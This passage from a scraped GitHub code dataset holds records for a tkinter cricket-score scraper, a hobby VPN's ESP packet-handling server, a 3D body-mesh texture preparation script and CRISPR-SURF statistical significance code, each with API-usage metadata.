"usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 515, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 517, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 517, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 519, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 519, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 521, "usage_type": "call"}]}
+{"seq_id": "17359047519", "text": "from tkinter import *\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\nroot =Tk()\r\n\r\nurl = \"https://www.cricbuzz.com/\"\r\n\r\ntitle = Label(root, text='IPl', font=(\"Haveltica 30 bold\"))\r\ntitle.grid(row=1, padx=5)\r\nroot.title('IPL')\r\n\r\nteams = Label(root, font=(\"Haveltica 20 bold\"))\r\nteams.grid(row=1, padx=5)\r\n\r\nscores = Label(root, font=(\"Haveltica 20 bold\"))\r\nscores.grid(row=2, padx=5)\r\n\r\ndef get_score():\r\n page = requests.get(url)\r\n soup = BeautifulSoup(page.text,'html.parser')\r\n team_1 = soup.find_all(class_ =\"cb-ovr-flo cb-hmscg-tm-nm\")[0].get_text()\r\n team_2 = soup.find_all(class_ =\"cb-ovr-flo cb-hmscg-tm-nm\")[1].get_text()\r\n\r\n team_1_score = soup.find_all(class_=\"cb-ovr-flo\")[8].get_text()\r\n team_2_score = soup.find_all(class_=\"cb-ovr-flo\")[10].get_text()\r\n\r\n teams.config(text=f\"{team_1}\\t\\t{team_2}\")\r\n scores.config(text=f\"{team_1_score}\\t{team_2_score}\")\r\n\r\n scores.after(1000,get_score)\r\n\r\n\r\n\r\n\r\n\r\n get_score()\r\n root.mainloop()", "repo_name": "farhanibne/ipl_py", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 980, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 20, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "9393260742", "text": "# Very bad ESP server implementation\n\nfrom Crypto.Cipher import AES\nfrom Crypto.Hash import SHA256, HMAC\nfrom socket import socket, AF_INET6, SOCK_RAW, SOCK_DGRAM, IPPROTO_ESP\nfrom socket import *\nfrom threading import Thread\nfrom time import sleep\n\nimport os\n\nfrom classes import *\nfrom consts import *\n\ns: socket = None\nthing = {} # idi: [q, a, k, idr, ikeid]\n\n\ndef recv(id):\n\twhile len(thing[id]['q']) == 0:\n\t\tsleep(0.1)\n\treturn thing[id]['q'].pop(0)\n\n\ndef handle(id):\n\ts = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)\n\ts.bind((\"0.0.0.0\", 0))\n\twhile True:\n\t\tbuf = recv(id)\n\t\tiv = buf[8:24]\n\t\tenc = buf[24:-32]\n\t\ticv = buf[-32:]\n\t\t# Decrypt\n\t\tcipher = AES.new(thing[id]['ek'], AES.MODE_CBC, iv)\n\t\tdec = cipher.decrypt(enc)\n\t\ts.sendto(dec, (\"1.1.1.1\", 0))\n\ndef handle_catch(id):\n\ttry:\n\t\thandle(id)\n\texcept ESPException as e:\n\t\tif len(e.args[0]) == 2:\n\t\t\tn = NotifyPayload(*e.args[0])\n\t\telse:\n\t\t\tn = NotifyPayload(e.args[0][0], b'')\n\t\tif len(thing[id][2]):\n\t\t\tn = EncryptedPayload(id, [n])\n\t\tnm = Message(id, e.args[1], e.args[2], True, False, [n]).build()\n\t\tmisoq.append((nm, thing[id]['a']))\n\tprint(\"deleting\")\n\tdel thing[id]\n\ndef main(misoq_in, mosiq_in, _):\n\tglobal s, misoq, mosiq\n\tif os.getuid():\n\t\ts = socket(AF_INET6, SOCK_DGRAM)\n\t\ts.bind((\"::\", 5000))\n\telse:\n\t\ts = socket(AF_INET, SOCK_RAW, IPPROTO_ESP)\n\ts.setblocking(0)\n\tmisoq, mosiq = misoq_in, mosiq_in\n\n\twhile True:\n\t\ttry:\n\t\t\tfor msg in mosiq:\n\t\t\t\tprint('recieved msg')\n\t\t\t\tthing[msg['ispi']] = {'q': [], 'a': None, 'ek': msg['ek'], 'ak': msg['ak'], 'idr': msg['rspi'], 'ikeid': msg['id']}\n\t\t\t\tThread(target=handle_catch, args=(msg['ispi'],), daemon=True).start()\n\t\t\tfor i in range(len(mosiq)):\n\t\t\t\tmosiq.pop()\n\t\t\tbuf, a = s.recvfrom(65535)\n\t\t\tbuf = buf[20:]\n\t\t\tid = buf[:4]\n\t\t\tif id in thing:\n\t\t\t\t# Append to existing queue\n\t\t\t\tthing[id]['q'].append(buf)\n\t\t\t\tthing[id]['a'] = a\n\t\texcept BlockingIOError: sleep(0.01)\n", "repo_name": "wdotmathree/VPN", "sub_path": "esp.py", "file_name": "esp.py", "file_ext": "py", "file_size_in_byte": 1875, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "socket.socket", "line_number": 15, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 21, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 26, "usage_type": "call"}, {"api_name": "socket.SOCK_RAW", "line_number": 26, "usage_type": "argument"}, {"api_name": "Crypto.Cipher.AES.new", "line_number": 34, "usage_type": "call"}, {"api_name": "Crypto.Cipher.AES", "line_number": 34, "usage_type": "name"}, {"api_name": "Crypto.Cipher.AES.MODE_CBC", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.getuid", "line_number": 55, "usage_type": "call"}, {"api_name": "socket.socket", "line_number": 56, "usage_type": "call"}, {"api_name": "socket.AF_INET6", "line_number": 56, "usage_type": "argument"}, {"api_name": "socket.SOCK_DGRAM", "line_number": 56, "usage_type": "argument"}, {"api_name": "socket.socket", "line_number": 59, "usage_type": "call"}, {"api_name": "socket.SOCK_RAW", "line_number": 59, "usage_type": "argument"}, {"api_name": "socket.IPPROTO_ESP", "line_number": 59, "usage_type": "argument"}, {"api_name": "threading.Thread", "line_number": 68, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 78, "usage_type": 
"call"}]}
+{"seq_id": "17805434187", "text": "import torch\nimport numpy as np\nfrom dataset.dataset import getDatasetAndLoader\nfrom model import getOptNet\nfrom pyhocon import ConfigFactory,HOCONConverter\nimport argparse\nimport trimesh\nimport openmesh as om\nimport os\nimport os.path as osp\nfrom MCAcc import Seg3dLossless\nimport utils\nimport cv2\nfrom tqdm import tqdm\nfrom pytorch3d.renderer import (\n\tRasterizationSettings, \n\tMeshRasterizer,\n\tSoftSilhouetteShader,\n\tHardPhongShader,\n\tBlendParams,\n\tPointsRasterizationSettings,\n\tPointsRenderer,\n\tPointsRasterizer,\n\tAlphaCompositor\n)\nfrom pytorch3d.renderer.mesh.renderer import MeshRendererWithFragments\nfrom pytorch3d.io import load_obj\nimport scipy\nfrom scipy.spatial.transform import Rotation\n\nparser = argparse.ArgumentParser(description='neu video body infer')\nparser.add_argument('--gpu-ids',nargs='+',type=int,metavar='IDs',\n\t\t\t\t\thelp='gpu ids')\nparser.add_argument('--num',default=120,type=int,metavar='IDs',\n\t\t\t\t\thelp='Number of used frames')\n# parser.add_argument('--conf',default=None,metavar='M',\n# help='config file')\nparser.add_argument('--rec-root',default=None,metavar='M',\n\t\t\t\t\thelp='data root')\nargs = parser.parse_args()\nroot=osp.normpath(args.rec_root)\nassert(osp.isfile(osp.join(args.rec_root,'template','uvmap.obj')))\n\nconfig=ConfigFactory.parse_file(osp.join(root,'config.conf'))\ndevice=args.gpu_ids[0]\ndeformer_condlen=config.get_int('mlp_deformer.condlen')\nrenderer_condlen=config.get_int('render_net.condlen')\n# batch_size=config.get_int('train.coarse.batch_size')\nbatch_size=1\nshuffle=False\ndataset,dataloader=getDatasetAndLoader(osp.normpath(osp.join(root,osp.pardir)),{'deformer':deformer_condlen,'renderer':renderer_condlen},batch_size,\n\t\t\t\t\t\tshuffle,config.get_int('train.num_workers'),\n\t\t\t\t\t\tFalse,False,False)\n\nresolutions = [\n (10+1, 14+1, 6+1),\n (20+1, 28+1, 12+1),\n (40+1, 56+1, 24+1),\n (80+1, 112+1, 48+1),\n (160+1, 224+1, 96+1),\n]\n\noptNet,sdf_initialized=getOptNet(dataset,batch_size,None,None,resolutions,device,config)\n\nprint('load model: '+osp.join(root,'latest.pth'))\noptNet,dataset=utils.load_model(osp.join(root,'latest.pth'),optNet,dataset,device)\noptNet.dataset=dataset\noptNet.eval()\n\n\nratio={'sdfRatio':1.,'deformerRatio':1.,'renderRatio':1.}\n\ntmpMesh=load_obj(osp.join(args.rec_root,'template','uvmap.obj'))\n\nTmpVs=tmpMesh[0].to(device)\nTmpfs=tmpMesh[1].verts_idx.to(device)\n\nTmpTexCoords=tmpMesh[2].verts_uvs.numpy()\nTmpTexfs=tmpMesh[1].textures_idx.numpy()\n\nindices_texture = np.ceil(np.arange(args.num) * dataset.frame_num * 1. / args.num).astype(np.int)\n# indices_texture = np.ceil(np.arange(args.num) * 260 * 1. 
/ args.num).astype(np.int)\n\ndefVs=[]\n\nwith torch.no_grad():\n\tfor fid in indices_texture:\n\t\tfid=torch.tensor([fid])\n\t\tposes,trans,d_cond,rendcond=optNet.dataset.get_grad_parameters(fid,device)\n\t\tdefTmpVs=optNet.deformer(TmpVs[None,:,:],[d_cond,[poses,trans]],ratio=ratio)\n\t\tdefVs.append(defTmpVs.cpu().numpy().reshape(-1,3))\n\t# poses,trans,d_cond,rendcond=optNet.dataset.get_grad_parameters(0,device)\n\t# inter_results={}\n\t# optNet.deformer.defs[1](TmpVs.unsqueeze(0),[poses.unsqueeze(0),trans.unsqueeze(0)],inter_results=inter_results)\ndefVs=np.stack(defVs)\n\ncam_data={}\ncam_data['cam_c']=dataset.camera_params['princeple_points'].cpu().view(2).numpy()\ncam_data['cam_f']=dataset.camera_params['focal_length'].cpu().view(2).numpy()\ncam_data['cam_k']=np.zeros(5)\ncam_t=dataset.camera_params['world2cam_coord_trans'].cpu().view(3).numpy()\ncam_t[0]=-cam_t[0]\ncam_t[1]=-cam_t[1]\ncam_data['cam_t']=cam_t\ncam_rt=dataset.camera_params['cam2world_coord_quat'].cpu().view(4)[[1,2,3,0]].numpy()\ncam_rt/=np.linalg.norm(cam_rt)\ncam_rt=Rotation.from_quat(cam_rt).as_matrix().T\ncam_rt[0,:]=-cam_rt[0,:]\ncam_rt[1,:]=-cam_rt[1,:]\ncam_rt=Rotation.from_matrix(cam_rt).as_rotvec()\ncam_data['cam_rt']=cam_rt\n\nnp.savez(osp.join(args.rec_root,'template','tex_predata.npz'),vt=TmpTexCoords,ft=TmpTexfs,tmpvs=TmpVs.cpu().numpy(),fs=Tmpfs.cpu().numpy(),defVs=defVs,fids=indices_texture,**cam_data)\n# np.savez(osp.join(args.rec_root,'template','data.npz'),skin_ws=inter_results['weights'].cpu().numpy(),shape=dataset.shape.cpu().numpy(),pose=utils.smpl_tmp_Apose(config.get_int('train.skinner_pose_type') if 'train.skinner_pose_type' in config else 0))\n\nprint('done')", "repo_name": "jby1993/SelfReconCode", "sub_path": "texture_mesh_prepare.py", "file_name": "texture_mesh_prepare.py", "file_ext": "py", "file_size_in_byte": 4229, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 381, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "name"}, {"api_name": "os.path.isfile", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "pyhocon.ConfigFactory.parse_file", "line_number": 44, "usage_type": "call"}, {"api_name": "pyhocon.ConfigFactory", "line_number": 44, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "name"}, {"api_name": "dataset.dataset", "line_number": 51, "usage_type": "name"}, {"api_name": "dataset.dataset.getDatasetAndLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path.pardir", "line_number": 51, "usage_type": "attribute"}, {"api_name": "model.getOptNet", "line_number": 63, "usage_type": "call"}, {"api_name": "dataset.dataset", "line_number": 63, "usage_type": "argument"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "name"}, {"api_name": "dataset.dataset", "line_number": 66, "usage_type": "name"}, {"api_name": 
"utils.load_model", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "name"}, {"api_name": "dataset.dataset", "line_number": 67, "usage_type": "name"}, {"api_name": "pytorch3d.io.load_obj", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "name"}, {"api_name": "numpy.ceil", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 81, "usage_type": "call"}, {"api_name": "dataset.dataset.frame_num", "line_number": 81, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 81, "usage_type": "name"}, {"api_name": "numpy.int", "line_number": 81, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 86, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.stack", "line_number": 95, "usage_type": "call"}, {"api_name": "dataset.dataset.camera_params", "line_number": 98, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 98, "usage_type": "name"}, {"api_name": "dataset.dataset.camera_params", "line_number": 99, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 100, "usage_type": "call"}, {"api_name": "dataset.dataset.camera_params", "line_number": 101, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 101, "usage_type": "name"}, {"api_name": "dataset.dataset.camera_params", "line_number": 105, "usage_type": "attribute"}, {"api_name": "dataset.dataset", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.linalg.norm", "line_number": 106, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 106, "usage_type": "attribute"}, {"api_name": "scipy.spatial.transform.Rotation.from_quat", "line_number": 107, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 107, "usage_type": "name"}, {"api_name": "scipy.spatial.transform.Rotation.from_matrix", "line_number": 110, "usage_type": "call"}, {"api_name": "scipy.spatial.transform.Rotation", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.savez", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 113, "usage_type": "call"}, {"api_name": "os.path", "line_number": 113, "usage_type": "name"}]}
+{"seq_id": "36949026249", "text": "#!/usr/bin/env python\npymin = min\npyabs = abs\n# from cvxpy import *\nimport pandas as pd\nimport numpy as np\nfrom scipy.stats import norm\nfrom scipy.stats import laplace\nimport random\nimport logging\nimport multiprocessing as mp\nfrom statsmodels.sandbox.stats.multicomp import multipletests\n\nfrom CRISPR_SURF_Deconvolution import crispr_surf_deconvolution_simulations, crispr_surf_statistical_power\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\ndef crispr_surf_deconvolved_signal(gammas2betas, gamma_chosen, averaging_method, out_dir):\n\n\t\"\"\"\n\tFunction to construct final deconvolved signal based on chosen gamma.\n\tThe gammas2betas dictionary has structure: Keys: 1) Replicate, 2) Gamma\n\tAveraging method can be mean or median to combine all biological replicates.\n\t\"\"\"\n\n\t# Create combined deconvolved signals from replicates\n\tdeconvolved_signal = {}\n\tfor i in [x for x in gammas2betas.keys() if ((x != 'combined') and (x != 'gamma_chosen') and (x != 'padj') and (x != 'indices') and (x != 'chr') and (x != 'p'))]:\n\n\t\tfor j in range(len(gammas2betas[i][gamma_chosen])):\n\n\t\t\tif j not in deconvolved_signal:\n\t\t\t\tdeconvolved_signal[j] = []\n\n\t\t\tdeconvolved_signal[j].append(gammas2betas[i][gamma_chosen][j])\n\n\t# Create mean or median profile\n\tif averaging_method == 'mean':\n\t\tgammas2betas['combined'] = [np.mean(deconvolved_signal[x]) for x in deconvolved_signal]\n\n\telif averaging_method == 'median':\n\t\tgammas2betas['combined'] = [np.median(deconvolved_signal[x]) for x in deconvolved_signal]\n\n\tgammas2betas['gamma_chosen'] = gamma_chosen\n\tgammas2betas['indices'] = gammas2betas[1]['indices']\n\tgammas2betas['chr'] = gammas2betas[1]['chr']\n\n\tchrom = gammas2betas['chr']\n\tindices = gammas2betas['indices']\n\tbetas = gammas2betas['combined']\n\n\t# df = pd.DataFrame({\n\t# \t'Chr': chrom,\n\t# \t'Index': indices,\n\t# \t'Beta': betas\n\t# \t})\n\n\t# df.to_csv(path_or_buf = (out_dir + '/beta_profile.bedgraph'), index = False, header = False, columns = ['Chr','Index','Index','Beta'], sep = '\\t')\n\n\treturn gammas2betas\n\ndef crispr_surf_statistical_significance(sgRNA_summary_table, sgRNA_indices, perturbation_profile, gammas2betas, null_distribution, simulation_n, test_type, guideindices2bin, averaging_method, padj_cutoffs, effect_size, limit, scale, estimate_statistical_power):\n\n\t\"\"\"\n\tFunction to assess the statistical significance of deconvolved genomic signal.\n\tCalculates empirical p-values for each beta, then performs FDR correction through the Benjamini-Hochberg procedure for p.adj.-values.\n\t\"\"\"\n\n\t# Load sgRNA summary table\n\tdf_summary_table = pd.read_csv(sgRNA_summary_table)\n\treplicates = len([x for x in df_summary_table.columns.tolist() if 'Log2FC_Replicate' in x])\n\n\t# Gamma chosen for downstream analysis\n\tgamma_chosen = gammas2betas['gamma_chosen']\n\n\t# Load estimated betas into dictionary\n\tbeta_distributions = {}\n\tfor i in range(len(gammas2betas['combined'])):\n\n\t\tbeta_distributions[i] = gammas2betas['combined'][i]\n\n\t# Decide how to draw from null distribution and perform deconvolution on simulated null arrays\n\tlogger.info('Performing %s simulations to construct beta null distributions ...' 
% (simulation_n))\n\n\tif null_distribution == 'negative_control':\n\t\tif 'negative_control' not in df_summary_table['sgRNA_Type'].unique().tolist():\n\t\t\tnull_distribution = 'gaussian'\n\n\treplicate_parameters = []\n\tif null_distribution == 'negative_control':\n\n\t\treplicate_parameters.append('NA')\n\n\t\t# Grab all negative control sgRNA lfc scores\n\t\tnegative_control_guide_scores = []\n\t\tfor i in range(1, int(replicates) + 1):\n\t\t\tnegative_control_guide_scores.append(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] == 'negative_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\n\t\t# Construct many simulated null arrays to perform deconvolution\n\t\tbeta_distributions_null = crispr_surf_deconvolution_simulations(negative_control_scores = ['negative_control_guides', negative_control_guide_scores], sgRNA_indices = sgRNA_indices, perturbation_profile = perturbation_profile, gamma_list = [gamma_chosen], simulations_n = simulation_n, replicates = replicates, guideindices2bin = guideindices2bin, averaging_method = averaging_method, scale = scale)\n\n\telif null_distribution == 'laplace':\n\n\t\t# Parameterize observed signal with laplace distribution (assume majority of observation sgRNAs are null)\n\t\tfor i in range(1, int(replicates) + 1):\n\n\t\t\t# # Remove distribution skew\n\t\t\t# sorted_nc = sorted(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\t# median_val = np.median(sorted_nc)\n\t\t\t# left_tail_median = np.median(sorted_nc[:int(0.1*len(sorted_nc))])\n\t\t\t# right_tail_median = np.median(sorted_nc[-int(0.1*len(sorted_nc)):])\n\n\t\t\t# # Left skewed\n\t\t\t# if (median_val - left_tail_median) > (right_tail_median - median_val):\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x >= median_val]\n\n\t\t\t# # Right skewed\n\t\t\t# else:\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x <= median_val]\n\t\t\t\n\t\t\t# half_dist_mirrored = [(2*median_val - x) for x in half_dist]\n\t\t\t# total_dist = half_dist + half_dist_mirrored\n\t\t\t# replicate_parameters.append(laplace.fit(total_dist))\n\n\t\t\t# Parameterize distribution directly\n\t\t\tobservation_median = np.median(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\tlaplace_loc, laplace_scale = laplace.fit(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\treplicate_parameters.append([observation_median, laplace_scale])\n\n\t\t# Construct many simulated null arrays to perform deconvolution\n\t\tbeta_distributions_null = crispr_surf_deconvolution_simulations(negative_control_scores = ['laplace', replicate_parameters], sgRNA_indices = sgRNA_indices, perturbation_profile = perturbation_profile, gamma_list = [gamma_chosen], simulations_n = simulation_n, replicates = replicates, guideindices2bin = guideindices2bin, averaging_method = averaging_method, scale = scale)\n\n\telif null_distribution == 'gaussian':\n\n\t\t# Parameterize observed signal with gaussian distribution (assume majority of observation sgRNAs are null)\n\t\tfor i in range(1, int(replicates) + 1):\n\n\t\t\t# # Remove distribution skew\n\t\t\t# sorted_nc = sorted(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\t# median_val = 
np.median(sorted_nc)\n\t\t\t# left_tail_median = np.median(sorted_nc[:int(0.1*len(sorted_nc))])\n\t\t\t# right_tail_median = np.median(sorted_nc[-int(0.1*len(sorted_nc)):])\n\n\t\t\t# # Left skewed\n\t\t\t# if (median_val - left_tail_median) > (right_tail_median - median_val):\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x >= median_val]\n\n\t\t\t# # Right skewed\n\t\t\t# else:\n\t\t\t# \thalf_dist = [x for x in sorted_nc if x <= median_val]\n\t\t\t\n\t\t\t# half_dist_mirrored = [(2*median_val - x) for x in half_dist]\n\t\t\t# total_dist = half_dist + half_dist_mirrored\n\t\t\t# replicate_parameters.append(norm.fit(total_dist))\n\n\t\t\t# Parameterize distribution directly\n\t\t\tobservation_median = np.median(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\tgaussian_loc, gaussian_scale = norm.fit(np.array(df_summary_table.loc[(df_summary_table['sgRNA_Type'] != 'positive_control'), ['Log2FC_Replicate' + str(i)]]).flatten().tolist())\n\t\t\treplicate_parameters.append([observation_median, gaussian_scale])\n\n\t\t# Construct many simulated null arrays to perform deconvolution\n\t\tbeta_distributions_null = crispr_surf_deconvolution_simulations(negative_control_scores = ['gaussian', replicate_parameters], sgRNA_indices = sgRNA_indices, perturbation_profile = perturbation_profile, gamma_list = [gamma_chosen], simulations_n = simulation_n, replicates = replicates, guideindices2bin = guideindices2bin, averaging_method = averaging_method, scale = scale)\n\n\t# Calculate p-values\n\tlogger.info('Calculating p. values for %s betas ...' % (len(beta_distributions)))\n\n\tbeta_pvals = []\n\tif test_type == 'nonparametric':\n\n\t\tfor i in range(len(beta_distributions)):\n\n\t\t\tif (i + 1)%500 == 0:\n\t\t\t\tlogger.info('Calculated p. values for %s out of %s betas ...' % ((i + 1), len(beta_distributions)))\n\n\t\t\testimated_beta = beta_distributions[i]\n\t\t\t# null_betas = beta_distributions_null[i]\n\t\t\t# beta_pvals.append(2.0*float(max(0.0, min(sum(x >= estimated_beta for x in null_betas), sum(x <= estimated_beta for x in null_betas))))/float(len(null_betas)))\n\n\t\t\tnull_betas = np.array(beta_distributions_null[i])\n\t\t\tbeta_pvals.append(2.0 * min((null_betas >= estimated_beta).sum(), (null_betas <= estimated_beta).sum()) / float(len(null_betas)))\n\n\telif test_type == 'parametric':\n\n\t\tfor i in range(len(beta_distributions)):\n\n\t\t\tif (i + 1)%500 == 0:\n\t\t\t\tlogger.info('Calculated p. values for %s out of %s betas ...' % ((i + 1), len(beta_distributions)))\n\n\t\t\testimated_beta = beta_distributions[i]\n\t\t\tnull_betas_loc, null_betas_scale = norm.fit(beta_distributions_null[i])\n\t\t\t\n\t\t\tbeta_pvals.append(2.0*float(max(0.0, min([norm(loc = null_betas_loc, scale = null_betas_scale).sf(estimated_beta), 1.0 - norm(loc = null_betas_loc, scale = null_betas_scale).sf(estimated_beta)]))))\n\n\tlogger.info('Calculated p. values for %s out of %s betas ...' 
% (len(beta_distributions), len(beta_distributions)))\n\n\tbeta_pvals_adj = multipletests(pvals = beta_pvals, alpha = 0.05, method = 'fdr_bh')[1]\n\tgammas2betas['p'] = beta_pvals\n\tgammas2betas['padj'] = beta_pvals_adj\n\n\tnew_p_cutoff = beta_pvals[pymin(range(len(beta_pvals_adj)), key=lambda i: pyabs(beta_pvals_adj[i] - float(padj_cutoffs[0])))]\n\t\n\t# Estimate statistical power\n\tif estimate_statistical_power == 'yes':\n\t\tbeta_statistical_power = []\n\t\tif scale > 1:\n\t\t\tbeta_corrected_effect_size = crispr_surf_statistical_power(sgRNA_indices = guideindices2bin.keys(), gammas2betas = gammas2betas, effect_size = effect_size, gamma_chosen = gamma_chosen, perturbation_profile = perturbation_profile, scale = scale)\n\n\t\telse:\n\t\t\tbeta_corrected_effect_size = crispr_surf_statistical_power(sgRNA_indices = sgRNA_indices, gammas2betas = gammas2betas, effect_size = effect_size, gamma_chosen = gamma_chosen, perturbation_profile = perturbation_profile, scale = scale)\n\n\t\tfor i in range(len(beta_corrected_effect_size)):\n\n\t\t\t# shifted_distribution = [x + beta_corrected_effect_size[i] for x in beta_distributions_null[i]]\n\t\t\t# percentile_cutoff = np.percentile(beta_distributions_null[i], (100.0 - float(new_p_cutoff)*100.0/2.0))\n\n\t\t\tbeta_dist_null = np.array(beta_distributions_null[i])\n\t\t\tshifted_distribution = beta_dist_null + beta_corrected_effect_size[i]\n\t\t\tpercentile_cutoff = np.percentile(beta_dist_null, (100.0 - float(new_p_cutoff)*100.0/2.0))\n\n\t\t\tif (i + 1)%500 == 0:\n\t\t\t\tlogger.info('Calculated statistical power for %s out of %s betas ...' % ((i + 1), len(beta_distributions)))\n\n\t\t\t# beta_statistical_power.append(float(sum(x >= percentile_cutoff for x in shifted_distribution))/float(len(shifted_distribution)))\n\n\t\t\tbeta_statistical_power.append((shifted_distribution > percentile_cutoff).sum() / float(len(shifted_distribution)))\n\n\t\tgammas2betas['power'] = beta_statistical_power\n\n\treturn gammas2betas, replicate_parameters", "repo_name": "pinellolab/CRISPR-SURF", "sub_path": "SURF/command_line/CRISPR_SURF_Statistical_Significance.py", "file_name": "CRISPR_SURF_Statistical_Significance.py", "file_ext": "py", "file_size_in_byte": 11265, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 15, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 16, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_deconvolution_simulations", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 127, "usage_type": "call"}, {"api_name": "scipy.stats.laplace.fit", "line_number": 128, "usage_type": "call"}, {"api_name": "scipy.stats.laplace", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 128, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_deconvolution_simulations", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 158, "usage_type": "call"}, 
{"api_name": "scipy.stats.norm.fit", "line_number": 159, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 159, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 159, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_deconvolution_simulations", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 180, "usage_type": "call"}, {"api_name": "scipy.stats.norm.fit", "line_number": 191, "usage_type": "call"}, {"api_name": "scipy.stats.norm", "line_number": 191, "usage_type": "name"}, {"api_name": "scipy.stats.norm", "line_number": 193, "usage_type": "call"}, {"api_name": "statsmodels.sandbox.stats.multicomp.multipletests", "line_number": 197, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_statistical_power", "line_number": 207, "usage_type": "call"}, {"api_name": "CRISPR_SURF_Deconvolution.crispr_surf_statistical_power", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 219, "usage_type": "call"}]}
